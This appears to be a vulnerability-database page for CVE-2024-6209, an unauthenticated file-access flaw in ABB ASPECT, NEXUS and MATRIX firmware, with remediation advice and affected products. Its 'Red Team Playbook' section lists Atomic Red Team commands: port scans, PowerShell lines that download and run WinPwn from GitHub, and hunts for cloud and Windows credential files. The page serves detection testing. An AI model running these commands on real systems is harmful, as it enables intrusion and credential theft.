CVE-2024-6209
Overview
This vulnerability is an unauthorized file access flaw caused by improper access control in the WEB Server component of ABB ASPECT-Enterprise versions 3.08.01 for NEXUS and MATRIX Series devices. The root cause lies in the failure to enforce authorization checks on file retrieval requests, allowing unauthenticated remote attackers to access sensitive files. The affected component is the WEB Server interface handling file access operations.
Vulnerability Description
Unauthorized file access in WEB Server in ABB ASPECT - Enterprise v3.08.01; NEXUS Series v3.08.01 ; MATRIX Series v3.08.01 allows Attacker to access files unauthorized
Impact
An unauthenticated remote attacker can exploit this vulnerability to access sensitive files on the device without any privileges, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This unauthorized file access can lead to disclosure of configuration data, credentials, or other sensitive information critical to operational technology environments. The attacker requires only network access to the device's WEB Server, enabling potential reconnaissance or further exploitation within industrial control systems.
Solution
ABB recommends upgrading ABB ASPECT-Enterprise firmware to versions later than 3.08.01 as detailed in their security advisory (Document ID 9AKK108469A7497). The advisory provides instructions for applying patches that enforce proper authorization checks in the WEB Server component. Users should refer to the official ABB download portal for the latest firmware updates and follow vendor guidelines to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the WEB Server of ABB ASPECT and NEXUS Series firmware versions 3.08.01 allows unauthorized file access, which poses a significant threat to the integrity and confidentiality of sensitive data. This flaw arises from improper access controls that fail to restrict user permissions adequately, enabling attackers to bypass authentication mechanisms and gain access to files that should be protected. The underlying issue is often rooted in misconfigured server settings or inadequate validation of user input, which can lead to unauthorized file retrieval or manipulation.
Attack vectors exploiting this vulnerability can vary, but they typically involve an attacker leveraging network access to the affected devices. By sending crafted requests to the WEB Server, an attacker can exploit the lack of proper authorization checks to retrieve sensitive files, including configuration files, logs, or even user credentials. Scenarios may include an external attacker scanning for exposed devices on the internet or an insider threat where a malicious actor within the organization exploits their access to gain further privileges. The ease of exploitation, combined with the potential for significant data exposure, underscores the critical nature of this vulnerability.
The real-world impact of unauthorized file access can be severe, particularly for organizations relying on ABB's automation and control systems. Compromised data can lead to operational disruptions, loss of intellectual property, and reputational damage. For instance, an attacker gaining access to configuration files could manipulate system settings, leading to production downtime or safety incidents in industrial environments. Furthermore, the exposure of sensitive information could result in regulatory penalties and loss of customer trust, translating into substantial financial losses for affected businesses.
Detection and mitigation strategies for this vulnerability should focus on both proactive and reactive measures. Organizations should implement robust access control mechanisms to ensure that only authorized users can access sensitive files. Regular audits of server configurations and user permissions can help identify and rectify misconfigurations. Additionally, employing intrusion detection systems (IDS) can assist in monitoring for suspicious activity indicative of exploitation attempts. Patching the affected firmware versions promptly is crucial, as updates often address known vulnerabilities and enhance overall security posture. Furthermore, educating employees about security best practices can reduce the risk of insider threats and improve the organization's resilience against external attacks.
In conclusion, the unauthorized file access vulnerability in ABB ASPECT and NEXUS Series firmware versions represents a critical security risk that organizations must address urgently. The potential for exploitation underscores the need for stringent access controls, regular security assessments, and timely updates to firmware. By adopting a comprehensive approach to cybersecurity that includes both technical measures and user education, organizations can significantly mitigate the risks associated with this vulnerability and protect their operational integrity and sensitive data.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Abb | Aspect-Ent-12 Firmware | All |
cpe:2.3:o:abb:aspect-ent-12_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-2 Firmware | All |
cpe:2.3:o:abb:aspect-ent-2_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-256 Firmware | All |
cpe:2.3:o:abb:aspect-ent-256_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-96 Firmware | All |
cpe:2.3:o:abb:aspect-ent-96_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128 Firmware | All |
cpe:2.3:o:abb:nexus-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-A Firmware | All |
cpe:2.3:o:abb:nexus-2128-a_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-F Firmware | All |
cpe:2.3:o:abb:nexus-2128-f_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-G Firmware | All |
cpe:2.3:o:abb:nexus-2128-g_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264 Firmware | All |
cpe:2.3:o:abb:nexus-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-A Firmware | All |
cpe:2.3:o:abb:nexus-264-a_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-F Firmware | All |
cpe:2.3:o:abb:nexus-264-f_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-G Firmware | All |
cpe:2.3:o:abb:nexus-264-g_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-2128 Firmware | All |
cpe:2.3:o:abb:nexus-3-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-264 Firmware | All |
cpe:2.3:o:abb:nexus-3-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-11 Firmware | All |
cpe:2.3:o:abb:matrix-11_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-216 Firmware | All |
cpe:2.3:o:abb:matrix-216_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-232 Firmware | All |
cpe:2.3:o:abb:matrix-232_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-264 Firmware | All |
cpe:2.3:o:abb:matrix-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-296 Firmware | All |
cpe:2.3:o:abb:matrix-296_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| ABB Cylon Aspect 3.08.01 - Arbitrary File Delete | LiquidWorm | webapps | php | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-150 | Collect Data from Common Resource Locations |
32%
|
— | Medium | |
| CAPEC-639 | Probe System Files |
30%
|
— | Medium |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-6209 |
| search.abb.com |
GitHub CVE
|
https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497&LanguageCode=en&DocumentPartId=&Action=Launch |
| search.abb.com |
NVD API
Vendor Advisory
|
https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497&LanguageCode=en&DocumentPartId=&Action=Launch&_ga=2.39956449.23035250.1719878527-141379670.1701144964 |